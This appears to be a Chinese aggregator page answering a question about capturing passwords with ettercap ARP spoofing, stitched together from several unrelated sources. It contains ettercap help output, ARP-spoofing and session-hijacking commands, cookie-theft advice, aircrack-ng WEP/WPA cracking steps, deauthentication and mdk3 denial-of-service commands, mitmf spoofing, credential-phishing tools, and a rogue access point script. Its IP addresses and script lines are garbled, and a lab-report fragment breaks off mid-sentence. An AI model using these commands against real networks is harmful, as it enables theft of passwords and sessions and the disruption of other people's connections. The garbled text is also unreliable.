求助，ARP欺骗 ettercap获取密码

第八部分:Ettercap之ARP欺骗 第九部分:Ettercap之DNS欺骗 7密码破解 第一部分:无线密码破解 第二部分:Cisco密码破解 这些功能都很强大,不过都有不同的用法都要

首先介绍一下Ettercap的使用方法，英文比较简单，这里就不翻译了，直接列出它的帮助说明：

Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IP/PORTs (see the man for further detail)

Sniffing and Attack options:

-M, --mitm <METHOD:ARGS> perform a mitm attack

-o, --only-mitm don't sniff, only perform the mitm attack

-b, --broadcast sniff packets destined to broadcast

-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)

-p, --nopromisc do not put the iface in promisc mode

-S, --nosslmitm do not forge SSL certificates

-u, --unoffensive do not forward packets

-r, --read <file> read data from pcapfile <file>

-f, --pcapfilter <string> set the pcap filter <string>

-R, --reversed use reversed TARGET matching

-t, --proto <proto> sniff only this proto (default is all)

--certificate <file> certificate file to use for SSL MiTM

--private-key <file> private key file to use for SSL MiTM

User Interface Type:

-T, --text use text only GUI

-q, --quiet do not display packet contents

-s, --script <CMD> issue these commands to the GUI

-C, --curses use curses GUI

-D, --daemon daemonize ettercap (no GUI)

-G, --gtk use GTK+ GUI

Logging options:

-w, --write <file> write sniffed data to pcapfile <file>

-L, --log <logfile> log all the traffic to this <logfile>

-l, --log-info <logfile> log only passive infos to this <logfile>

-m, --log-msg <logfile> log all the messages to this <logfile>

-c, --compress use gzip compression on log files

Visualization options:

-d, --dns resolves ip addresses into hostnames

-V, --visual <format> set the visualization format

-e, --regex <regex> visualize only packets matching this regex

-E, --ext-headers print extended header for every pck

-Q, --superquiet do not display user and password

General options:

-i, --iface <iface> use this network interface

-I, --liface show all the network interfaces

-Y, --secondary <ifaces> list of secondary network interfaces

-n, --netmask <netmask> force this <netmask> on iface

-A, --address <address> force this local <address> on iface

-P, --plugin <plugin> launch this <plugin>

-F, --filter <file> load the filter <file> (content filter)

-z, --silent do not perform the initial ARP scan

-j, --load-hosts <file> load the hosts list from <file>

-k, --save-hosts <file> save the hosts list to <file>

-W, --wifi-key <wkey> use this key to decrypt wifi packets (wep or wpa)

-a, --config <config> use the alterative config file <config>

Standard options:

-v, --version prints the version and exit

-h, --help

ARP欺骗之会话劫持：

ettercap -i eth0 -T -M arp:remote /10001/ // 欺骗局域网内所有主机

ettercap -i eth0 -T -M arp:remote /10001/ /100012/ 欺骗IP为100012的主机

同时使用tcpdump抓包（当然也可以使用wireshark实时抓包并显示，但对本机压力比较大，建议使用tcpdump抓包，完成后再用wireshark显示）：

tcpdump -i eth0

经过一段时间的抓包之后就可以停止了。打开wireshark分析捕获到的数据包分析，使用过滤语法，找出含有cookies的数据包：

复制出cookies的值，并在浏览器中利用，这里推荐一款好用的cooikes利用工具cookie-injecting-tools（地址：>

发个实验报告给你吧，希望能帮到你。

构建大型网络第五章-MST/HSRP

实验报告

实验时间

年/月/日 x时～ x时 // 实验完成所需的时间

实验人

伍永余

实验步骤

实验拓朴环境：

实验需求：

1 客户机11拼不通服务器1100

2 当客户机11访问FTP服务器1100,在输入密码时, 150能获取11的登陆密码及用户名

3 当客户机11访问>

首先，说破解，能pin的话查密码也是迟早的事，如果不能pin可以抓包跑包，反正拿无线密码还是比较容易

其次，说说拿到无线密码可以做什么，直接拿CAIN嗅探局域网，Session劫持，Cookie劫持，端口嗅探，拿一些账号和Cookie还是比较容易的事情，拿到Cookie就可以直接登录了完事想干什么就干什么

还有，现在手机端的嗅探软件Dsploit功能也很强大，上面所说的嗅探功能基本都有，甚至比电脑都有过之而无不及

所以，综上，无线网络的安全还是很不靠谱，你只能祈祷你周围没有丧心病狂的Hacker，还有公共无线最好别上淘宝等网站

一般被蹭基本是没有风险的，如果是别有用心的黑客的话风险会非常非常的大，首先中间人攻击就能够你喝一壶的。比如arp断网攻击还算小事，黑客连接至你的wifi可以清晰的看到你所浏览的网页，你加载的，你输入的密码，你接受的文件，还可以动用DNS污染给你跳转另外一个页面，诱导你下载木马。此中风险可想而知。著名的一些工具，而这些东西基本都可以在任何 *** 作系统上能够找到，Android和IOS系统，只凭借一个小小手机也能窃取你的信息。工具比如BT5ettercap，还有很多没有记住名字。

1保密性

我们攻击WIFI的第一个思路就是从保密性出发，我们希望从无线系统中获取用户的明文数据。首先，我们知道WIFI的的认证加密主要有以下四种方式：OPEN（无加密）、WEP（RC4）、WPA（TKIP）、WPA2（CCMP）。

OPEN的WIFI没有采取认证加密措施，任意用户均可链接WIFI，用户数据在BSS（基本服务集）中明文传输，恶意用户没有任何门槛就可连接，然后通过中间人攻击即可获取用户的数据（SSL、SSH等需要其他工具）。如下图所示：

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码，然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了，WEP抓取IVS包，WPA/WPA2抓取handshake包。

WEP大概如下：

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02ivs

WPA/WPA2大概如下：

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据，抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包，更快的获取handshake

aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2cap #破解wpa2密码

密码破解成功后即可连接AP，通过中间人的方式获取用户明文数据，或者直接用wireshark抓取加密包，然后通过airdecap-ng工具解密，然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功，取决于你字典是否强大，此时我们可以想办法诱骗用户主动输入WIFI密码，比如我们创建一个和目标AP具有同样ESSID的软AP，用户可以连接上，单在浏览网页时会d出一个虚假的认证页面，告诉用户必须输入WIFI的密码，用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码，但此密码并没有去验证，如果用户输入错误，也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验，成功方认为获取到密码。

2可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性，通常通过DOS攻击来实现，比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包，迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接，从而耗尽AP的资源造成DOS攻击

3真实性

（1）恶意用户进入无线系统后，可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗，ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 19216821 --target 19216821 --upsidedownternet

通过driftnet工具抓取目标浏览网页时的

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情，比如获取cookie，嵌入js，结合beef进一步攻击等等。。。

（2）伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器（必须先安装isc-dhcp-server），开启路由，开启系统转发，开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpdleases 7 touch /var/lib/dhcp/dhcpdleases 8 9 ifconfig at0 up10 ifconfig at0 10001 netmask 255255255011 route add -net 10000 netmask 2552552550 gw 1000112 sysctl netipv4ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpdconf -pf /var/run/dhcpdpid at015 echo '等待启动dhcp服务器'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点，并可以上网，但此时可以通过嗅探at0网卡获取用户数据。

4完整性

篡改用户数据，在WIFI攻击这块貌似用处不大。

5不可抵赖性

以上就是关于求助，ARP欺骗 ettercap获取密码全部的内容，包括:求助，ARP欺骗 ettercap获取密码、ettercap嗅探时提示SEND L3 ERROER ...(No route to host)、请教ettercap这款软件的使用方法。谢谢等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！